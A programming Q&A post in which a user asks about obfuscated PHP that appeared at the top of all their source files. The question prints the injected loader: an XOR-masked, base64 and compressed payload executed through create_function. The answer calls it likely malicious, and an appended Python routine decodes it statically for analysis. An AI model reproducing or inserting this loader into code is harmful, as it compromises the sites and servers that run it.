Unexplained code appearing in all php files

Tags: php, base64, eval

I have this code at the top of all my PHP files in the source control somehow.

Can someone please shed some light on what this is?

EDIT: I know it's most likely bad, I know that it is trying to create functions. But what exactly are those functions going to do? It is too jumbled!! If someone can spend some time on this, then hats off to them.

Otherwise, I am attempting this tomorrow with a fresh mind.

Thanks fellow stackoverflowERS for all the help :)

<?php
     $qhtgndmn;
    $qhtgndmn = array(
        '$qhtgndmn[0]=array_pop($qhtgndmn);$twpxkaml=twpxkaml(1,13);$qhtgndmn[0]=$twpxkaml($qhtgndmn[2]);',
        '$qhtgndmn[2]=gzuncompress(twpxkaml(696,2300));',
        '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' . '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' . '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' . 'O3602dC3+gik0rzVJwF0tvByeQdNlc8pi0zx6q0uAD2dFiVJls2FZebcUA9mABrO30vdbMfyabEldMkX+po+PkL63xJiahC4thVL1e4nWFcFxV9x7Ghfko/lu90HQKx20M6lw6H7zB2e+lso7K/NHiHefufUP7ACFPggcfLY/PKjdR4mrf0uMlGfF3NkU1wxbEDp7S8TBADcyvW1sTZenmKjRuynMZWsgzpaL1GbdxbxqCcZ8j0c07+9+9P1nxHvJgc8ivprlNJVvafZckzzR55LRxi5oUiaHczCE/tj3cDq+OfybEHUd+nqBkEibSrnxnsgNQnICSqIiqfWQU9Pnm2PW6cqe6R3SvK+fO9WnuVYr2L62smMwZDENU9H9zyS1odWMnmQI2LYiT46UblsDR8QGxakmpDGM8kSeob1ac0razk2DerXttvrtkQW7DlUcbSAfgNhxjMD2c8VjTndaD2CTLuTE0Q/bza7bj4pexmWS4cdEBm0jInUKQzvYuuu9WV14NebJmYGGomjoploNyVNTLEVcRGA6n51v2kKmfvT9ouHg4vjyT+H86rbFPfntj3yJBa4w+FNFEwimiXDzu0aGl+QFR0nwARSe1duCyC33NUkzMf0rbdtiXkmX5cfIhTW0pbrR7jutZABUcK8JONEOKUSKuMCwzxv/6JoX5z11J0a+btMArNMbz+UAMxhmxv/5FPW+RPM52gHCrXkpn/uXTuvUYWCr3Ks+fg9VggsdQuJGVWm2oM3lVeHAG5dCyqJtjl+OY8FwuP7PJNgCH+w2jS3dxXxGbX919c3BxDpGZ9imENYwU7K4h7LQ1zTytBETjPI3haqXM3cC3XJ4iOpmhB/mqTMBtAhNfNSuJyRqyA97ITUsCy3ZMzJ+f+schIIrwN/9mIowJNokAc1Z84Rdd5UCkeYeZeubY7Ar7d86uVCF8qvhptLc4KvF53MMazOLcfYczkf5F2oQSqaVOx/H' . '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',
        "f\x7bqem\x3c\x24Nchnmbd"
    );
    $hvnlvgr  = 'create_';
    if (function_exists($hvnlvgr .= 'function') && !function_exists('twpxkaml')) {
        function twpxkaml($d, $j)
        {
            global $qhtgndmn;
            $v = str_pad($g = 'yPvhJ0qgMmbfaIEZ', $j, $g);
            $e = str_repeat("\x1f", $j);
            $f = str_repeat("\xe0", $j);
            $n = substr($qhtgndmn[0], $d, $j);
            return (($n ^ $v) & $e) | ($n & $f);
        }
        ;
        for ($xv = -1; ++$xv < 3; $hvnlvgr('', '}' . $qhtgndmn[$xv] . '{'));
    }
    ;
    unset($qhtgndmn);

    var_
     ?>
Likes: 577
Vish asked Sep 26 '22 15:09
1 Answer

Looks like it's creating three anonymous functions with create_function, to execute obfuscated code it's hiding in the $qhtgndmn array and either decoding or obfuscating further with twpxkaml.

So assume it's malicious. Or by someone really, really bored. Check the commit log.

Likes: 132
Tom answered Oct 06 '22 01:10
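
The decoding the answer describes can be followed statically, without running the PHP. The Python below is an added example, not part of the original question or answer: it reimplements twpxkaml() from the posted code, and the names unmask, decode_stage2, hidden_function_name and constructed_roundtrip, as well as the stand-in blob, are constructed for illustration.

```python
import base64
import zlib

# Key and bit masks copied from twpxkaml() in the question's PHP.
KEY = b"yPvhJ0qgMmbfaIEZ"

def unmask(data: bytes, offset: int, length: int) -> bytes:
    """Python equivalent of twpxkaml($d, $j) applied to `data`.

    Each byte keeps its top three bits (& 0xe0); only the low five bits
    (& 0x1f) are XORed with the repeating key. The operation is its own
    inverse, so the same routine both hides and reveals text.
    """
    chunk = data[offset:offset + length]
    return bytes(((b ^ KEY[i % len(KEY)]) & 0x1F) | (b & 0xE0)
                 for i, b in enumerate(chunk))

def decode_stage2(b64_blob: str, offset: int, length: int) -> bytes:
    """Follow array elements 0 and 1 without executing anything:
    base64-decode the blob, unmask the slice, then zlib-decompress it
    (PHP's gzuncompress reads the zlib format)."""
    raw = base64.b64decode(b64_blob)
    return zlib.decompress(unmask(raw, offset, length))

# Last array element from the question, written out as bytes.
NAME_BLOB = b"f\x7bqem\x3c\x24Nchnmbd"

def hidden_function_name() -> str:
    # Element 0 calls twpxkaml(1, 13) on this string after array_pop().
    return unmask(NAME_BLOB, 1, 13).decode("ascii")

def constructed_roundtrip() -> bytes:
    """The page's payload is truncated, so build a harmless stand-in
    blob the same way and confirm the pipeline recovers it."""
    plain = b"/* constructed sample, not the real payload */"
    packed = zlib.compress(plain)
    masked = unmask(packed, 0, len(packed))   # masking == unmasking
    blob = base64.b64encode(b"\x00" * 8 + masked).decode("ascii")
    return decode_stage2(blob, 8, len(masked))

if __name__ == "__main__":
    print(hidden_function_name())   # name the sample resolves at run time
    print(constructed_roundtrip())
```

Applied to the last array element, the routine yields the string base64_decode, which is the function the first stage then calls on the large encoded element. With the complete blob from an infected file, decode_stage2(blob, 696, 2300) would return the second-stage source as bytes for reading, never for execution.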